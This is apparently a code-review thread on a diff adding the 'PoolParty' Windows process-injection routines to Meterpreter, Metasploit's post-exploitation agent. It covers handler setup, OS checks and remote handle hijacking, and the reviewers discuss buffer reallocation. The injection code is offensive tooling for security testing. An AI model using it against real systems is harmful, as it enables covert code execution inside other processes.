c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+				}
+				poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isSystemSupported;
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+	os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	NTSTATUS(*pRtlGetVersion)(OSVERSIONINFO * os) = (NTSTATUS(*)(OSVERSIONINFO * os)) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
+	dprintf("[INJECT][supports_poolparty_injection] RtlGetVersion: %p", pRtlGetVersion);
+	if (!pRtlGetVersion(&os)) {
+		dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
+		dprintf("[INJECT][supports_poolparty_injection] os.dwMajorVersion: %d os.dwMinorVersion: %d", os.dwMajorVersion, os.dwMinorVersion);
+		if (os.dwMajorVersion >= 10) {
+			if (dwDestinationArch == dwSourceArch && dwSourceArch == PROCESS_ARCH_X64) {
+				return TRUE;
+			}
+		}
+	}
+	return FALSE;
+}
+
+HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess) {
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 2048;
+	ULONG dwInformationSizeOut = 0;
+	HANDLE hCurrProcess = GetCurrentProcess();
+	HANDLE hHeap = GetProcessHeap();
+	PPROCESS_HANDLE_SNAPSHOT_INFORMATION lpProcessInfo = NULL;
+	PPUBLIC_OBJECT_TYPE_INFORMATION lpObjectInfo = NULL;
+	pNtDll* ntDll = GetOrInitNtDll();
+
+	DWORD ntStatus = 0;
+	lpProcessInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwInformationSizeIn);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p", lpProcessInfo);
+
+	while (TRUE) {
+		ntStatus = ntdll->pNtQueryInformationProcess(hProcess, ProcessHandleInformation, lpProcessInfo, dwInformationSizeIn, &dwInformationSizeOut);
+		dprintf("[INJECT][inject_via_poolparty][get_remote_handle] NtQueryInformationProcess() : %p", ntStatus);
+		if (ntStatus == 0xC0000004L && dwInformationSizeIn != dwInformationSizeOut) {
+			lpProcessInfo = HeapReAlloc(hHeap, 0, lpProcessInfo, dwInformationSizeOut);
+			dprintf("[INJECT][inject_via_poolparty][get_remote_handle] HeapReAlloc lpProcessInfo: %p", lpProcessInfo);
+			dwInformationSizeIn = dwInformationSizeOut;
```

Comment:
You're passing `dwInformationSizeIn` as the size of your information buffer, then overwriting that with the size you were given.  Since you're never going to get more information back than the size of your buffer specified, you're buffer will not overflow, but you could hit an instance where the required size is smaller than the advertised size of the buffer and possibly too small for the data.  I see you're using the in/out match as a condition in the conditional, but I'm not entirely sure why; it seems like it might bite us in the butt at some point?
If `dwInformationSizeOut` is larger than `dwInformationSizeIn` the buffer is too small, so that would the condition I would expect us to check?

Reply:
There is a `HeapReAlloc` that re allocate the buffer with the new size.

Reply:
Oh, I see what you're doing, now.  Right- I'd then change my suggestion to making sure the `HeapReAlloc` worked.